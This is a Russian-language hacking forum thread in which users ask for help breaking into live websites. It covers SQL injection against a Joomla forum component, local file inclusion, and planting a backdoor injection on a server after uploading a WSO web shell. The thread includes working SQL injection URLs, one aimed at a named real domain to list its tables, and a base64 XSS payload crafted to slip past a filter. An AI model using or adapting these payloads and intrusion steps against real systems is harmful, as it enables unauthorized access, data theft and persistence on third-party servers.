"грамотный" //забавно вышло )) Дело не в грамотности, а в удобстве использования... Сомневаюсь что у ТС именно этот случай.
Ребят, не могу скулю джумлувскую раскрутить имеется url компонент com_fireboard http://forum.antichat.ru/showpost.php?p=1416107&postcount=148 этот метод мягко говоря не помогает как и что в этой ситуации делать не знаю
Добрый час, есть url следующего вида http://site.ru/?p=3 если подставить несуществующий id то будет ошибка (например 9993) Warning: include(glob/ref9993_+.php) [function.include]: failed to open stream: No such file or directory in /home/u*****/siteru/www/global.php on line 26 как раскрутить тут php inj? получается добавляются символы до и после...
для начало чтоб задовать вопросы необходима ознакомиться со статьями по соотвецтвующему вопросу, а только потом уже задовать, также каждый случай уникален, и если вы хотите, чтоб вам помогли то раскрывайте урл полностью, по данному вопросу прочтите вот эту статейку https://forum.antichat.ru/thread12123.html
ок, спасибо за ответ, статьи читал и опыт с php inj есть, в моем случае получается локальный инклуд, проблема состоит в том что подставляются символы во время инклуда... не знаю как решить. url раскрывать в паблик не хочется, могу написать в ЛС ,если поможете.
Ребят,такая проблема,подскажите,плз... Есть сайт,висит на Windows,бд MSSQL...также на нем есть старый блог на вордпресс с MySQL и неприкрытым phpmyadmin...через блог залил шелл WSO,оказался внутри сервака,но под гостем...exe запускать не могу,но файлы сайта(asp) изменять могу...нашел данные от MSSQL,но по ним не подрубается... Вопрос: что нужно добавить к примеру в 404.asp,чтобы создать искусственную sql-иньецию(возможно у MSSQL больше прав)?
Code: http://admin.site.com//goods/?where=1)+limit+1,1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,user(),database(),version()),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+
Можно получить права админа mysql с помощью phpmyadmin 2.11.11.3 Учетка юзера в базе есть, к file нет привилегий.
нашел по сути банальную xss в input. проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов. знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы. где то проскакивал способ через eval, но я не осилил. + ограничение на 100 символов.
PHP: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> Где это <script>alert('XSS')</script>.
работать дальше тега input нельзя. и больше 100 символов писать нельзя на сайте закрыто все, что можно из xss... но одно поле забыли...и то сделали фильтрацию // только для того, что бы не было нагромождений и показывало обычный урл. Они даааже не подозревали, сколько это вызовет у меня негодований энибоди кен хелп ми?
такой вопросец нормально вывело версию PHP: http://www.chronopuncture.info/vr/index.php?md=details&id=108093%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+ пытаюсь к примеру вывести таблицы PHP: http://www.chronopuncture.info/vr/index.php?md=details&id=108093'+or+1+group+by+concat((select+concat_ws(0x3a,table_schema,table_name,table_rows)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+ уже переадресация, чёзаа байда, как боротся?